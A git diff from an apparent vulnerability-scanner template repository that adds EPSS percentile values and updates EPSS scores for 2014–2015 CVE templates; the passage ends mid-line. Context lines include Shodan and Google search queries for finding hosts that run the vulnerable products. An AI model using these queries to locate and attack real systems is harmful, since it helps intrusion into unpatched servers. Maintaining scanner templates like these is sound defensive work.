cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:* + epss-percentile: 0.84675 metadata: max-request: 1 vendor: webedition diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index d8c0b70213..04e9cf3415 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.08268 cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.93532 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-source-control" diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index 1da67e0e8b..e9b18dcd77 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-78 epss-score: 0.97566 cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:* + epss-percentile: 0.99997 metadata: max-request: 8 vendor: gnu diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index 02ecc35cd5..8aaa5d7bf8 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: 'CVE-2014-6287' cwe-id: CWE-94 - epss-score: 0.97315 + epss-score: 0.97289 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* + epss-percentile: 0.99787 metadata: max-request: 1 shodan-query: http.favicon.hash:2124459909 diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 382394a121..e812f8b67f 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.0922 cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* + epss-percentile: 0.93887 metadata: max-request: 1 vendor: osclass diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index ad862af9f6..5a61b9f4e3 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.00195 cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* + epss-percentile: 0.56565 metadata: max-request: 1 vendor: soplanning diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index d6b223ccc6..6b33f10350 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-89 epss-score: 0.00808 cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:* + epss-percentile: 0.79567 metadata: max-request: 1 shodan-query: title:"Sign In - Gogs" diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index d4f0792a08..8586fec882 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.17844 cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.9547 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/dukapress" diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index d3dc1bd90d..bfe13e09f4 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.83554 cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* + epss-percentile: 0.98005 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/dzs-videogallery" diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index d7b274ff66..e5508e72fe 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -17,8 +17,9 @@ info: cvss-score: 5 cve-id: CVE-2014-9119 cwe-id: CWE-22 - epss-score: 0.35426 + epss-score: 0.30825 cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.96385 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 430d3ccab7..23d3589182 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00287 cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* + epss-percentile: 0.64821 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index efe8af9c8a..101755d6d4 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00102 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* + epss-percentile: 0.40937 metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index be37a7d4c3..59db856637 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00102 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* + epss-percentile: 0.40937 metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 3a47ae981f..b2da0ce5fd 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00102 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* + epss-percentile: 0.40937 metadata: max-request: 1 vendor: netsweeper @@ -49,4 +50,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index 7bf486ae6c..f13c56b0c8 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5.3 cve-id: CVE-2014-9609 cwe-id: CWE-22 - epss-score: 0.00149 + epss-score: 0.00212 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* + epss-percentile: 0.5835 metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index dc03faeab2..f531e1854a 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-798 epss-score: 0.01433 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* + epss-percentile: 0.84911 metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 5a9e25679e..66c682b9b6 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00102 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:* + epss-percentile: 0.40937 metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index a68c2b43f9..ec6b679ec6 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00109 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* + epss-percentile: 0.43264 metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index 88ebfddbca..995e5dd042 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2014-9618 cwe-id: CWE-287 - epss-score: 0.04784 + epss-score: 0.03433 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* + epss-percentile: 0.90239 metadata: max-request: 1 vendor: netsweeper diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 437fa3f2be..7dad531c2f 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-264 epss-score: 0.0196 cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:* + epss-percentile: 0.87242 metadata: max-request: 1 vendor: adb diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index e8edfddced..5c15e3f477 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1000005 cwe-id: CWE-22 - epss-score: 0.03864 + epss-score: 0.04406 cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.91313 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index c7358e9464..72450b6d93 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-284 epss-score: 0.02653 cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.8903 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index 6e9e63b3af..7ad12951f0 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-200 epss-score: 0.00773 cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:* + epss-percentile: 0.79053 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/mypixs" diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 4836458e9d..ef4c816d77 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1427 cwe-id: CWE-284 - epss-score: 0.89427 + epss-score: 0.88469 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* + epss-percentile: 0.98266 metadata: max-request: 2 vendor: elasticsearch diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index fcd5595c82..d0a76c58a3 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1503 cwe-id: CWE-22 - epss-score: 0.95625 + epss-score: 0.94041 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* + epss-percentile: 0.98821 metadata: max-request: 2 shodan-query: title:"icewarp" diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index a9e3963ea6..9ef0fe02c1 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.92959 cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* + epss-percentile: 0.98662 metadata: max-request: 2 google-query: inurl:/wp-content/plugins/revslider diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 50e22d49d1..c243cc6aa6 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00201 cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* + epss-percentile: 0.57316 metadata: max-request: 1 vendor: fortinet diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index df78b925c1..c2df2187cb 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.01338 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* + epss-percentile: 0.84395 metadata: max-request: 1 shodan-query: http.component:"Magento" diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 67480a5b4d..2052e941f6 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00146 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* + epss-percentile: 0.49807 metadata: max-request: 1 shodan-query: http.component:"Magento" diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index e4f753a49f..725bfd9396 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-200 epss-score: 0.95465 cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* + epss-percentile: 0.99111 metadata: max-request: 1 vendor: fedoraproject diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index ef0c99aad9..14ee966d91 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5 cve-id: CVE-2015-2166 cwe-id: CWE-22 - epss-score: 0.16846 + epss-score: 0.27262 cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* + epss-percentile: 0.96165 metadata: max-request: 1 vendor: ericsson diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index b5536d0979..2df735a008 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-89 epss-score: 0.0093 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* + epss-percentile: 0.81015 metadata: max-request: 1 verified: true diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 23c9e7585f..bbdd2a9f0d 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-352 epss-score: 0.02569 cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.88871 metadata: max-request: 2 verified: true diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 76c4827d40..ab862a96ad 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.3 cve-id: CVE-2015-2807 cwe-id: CWE-79 - epss-score: 0.00535 + epss-score: 0.00665 cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.77092 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/navis-documentcloud" diff --git a/http/cves/2015/CVE-2015-2863.yaml b/http/cves/2015/CVE-2015-2863.yaml index 770188294b..e0f21c4d59 100644 --- a/http/cves/2015/CVE-2015-2863.yaml +++ b/http/cves/2015/CVE-2015-2863.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-601 epss-score: 0.00626 cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* + epss-percentile: 0.76316 metadata: max-request: 2 vendor: kaseya diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 4a464ad160..e19fb5b916 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.77754 cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* + epss-percentile: 0.97813 metadata: max-request: 2 shodan-query: http.favicon.hash:1540720428 diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index f94d264073..7ea064597d 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.58993 cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.97296 metadata: max-request: 1 shodan-query: http.title:"TP-LINK" diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index 18ead65f29..66b111e85e 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-284 epss-score: 0.93656 cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* + epss-percentile: 0.98766 metadata: max-request: 1 vendor: rubyonrails diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 4c31fc255f..e36c5d189c 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.96596 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* + epss-percentile: 0.99448 metadata: max-request: 1 vendor: elasticsearch diff --git a/http/cves/2015/CVE-2015-3648.yaml b/http/cves/2015/CVE-2015-3648.yaml index e3098e998d..c6db360871 100644 --- a/http/cves/2015/CVE-2015-3648.yaml +++ b/http/cves/2015/CVE-2015-3648.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.02644 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* + epss-percentile: 0.89012 metadata: max-request: 1 vendor: montala diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 3eecd182e4..8f0f407892 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5 cve-id: CVE-2015-3897 cwe-id: CWE-22 - epss-score: 0.88702 + epss-score: 0.83225 cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* + epss-percentile: 0.97993 metadata: max-request: 2 vendor: bonitasoft diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index bf5d521a22..d7ef97134e 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-284 epss-score: 0.00847 cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* + epss-percentile: 0.8003 metadata: max-request: 1 vendor: sensiolabs diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index d9b753b1b6..49cde91888 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -21,6 +21,7 @@ info: cwe-id: CWE-89 epss-score: 0.03336 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.90106 metadata: max-request: 2 verified: true diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index da1dbe7d65..c3d85e635d 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -18,8 +18,9 @@ info: cvss-score: 3.5 cve-id: CVE-2015-4063 cwe-id: CWE-79 - epss-score: 0.04125 + epss-score: 0.04016 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.90916 metadata: max-request: 2 verified: true diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index a93254e739..0cb08aab5d 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.00598 cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* + epss-percentile: 0.75681 metadata: max-request: 1 framework: joomla\! diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 7d0779267b..6542233953 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.0034 cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.67772 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index a5114ca4a9..0b3a728fd2 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5 cve-id: CVE-2015-4414 cwe-id: CWE-22 - epss-score: 0.10802 + epss-score: 0.11221 cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.94441 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player" diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 26af7a5705..8da1570978 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.05668 cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:* + epss-percentile: 0.9233 metadata: max-request: 1 vendor: koha diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index a7328d18c6..455a73ce0d 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.03324 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* + epss-percentile: 0.90091 metadata: max-request: 1 vendor: xceedium diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 7d067dba7d..29ed7b75f7 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-601 epss-score: 0.00397 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* + epss-percentile: 0.70183 metadata: max-request: 1 vendor: xceedium diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 51c99a77e6..ffbd2aa17b 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.6 cve-id: CVE-2015-4694 cwe-id: CWE-22 - epss-score: 0.01382 + epss-score: 0.02304 cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.88284 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/zip-attachments" diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 741931920d..0ca88f2a54 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-601 epss-score: 0.00166 cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* + epss-percentile: 0.52595 metadata: max-request: 1 vendor: novius-os diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 1170f49ccf..03c5ea65e5 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -18,6 +18,7 @@ info: cwe-id: NVD-CWE-Other epss-score: 0.0055 cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.74565 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/stageshow/" diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index bb26a89b34..f336b3ef93 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.02176 cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.87946 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 31a794faa6..1145f32d6a 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -17,8 +17,9 @@ info: cvss-score: 5.3 cve-id: CVE-2015-5471 cwe-id: CWE-22 - epss-score: 0.1035 + epss-score: 0.11139 cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* + epss-percentile: 0.94418 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-swimteam" diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index a348a4d5cc..a945219cb8 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.97074 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* + epss-percentile: 0.99659 metadata: max-request: 3 vendor: elasticsearch diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index bf5ca44f41..b9503c8ba7 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01347 cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* + epss-percentile: 0.84447 metadata: max-request: 1 framework: node.js diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 065d615e02..f07fa8bb69 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.3 cve-id: CVE-2015-6477 cwe-id: CWE-79 - epss-score: 0.00357 + epss-score: 0.00294 cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* + epss-percentile: 0.65327 metadata: max-request: 1 vendor: nordex diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index 1261c787aa..73c473aa05 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00284 cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* + epss-percentile: 0.64643 metadata: max-request: 1 vendor: combodo diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index a2692810fd..4fd826dca3 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -16,6 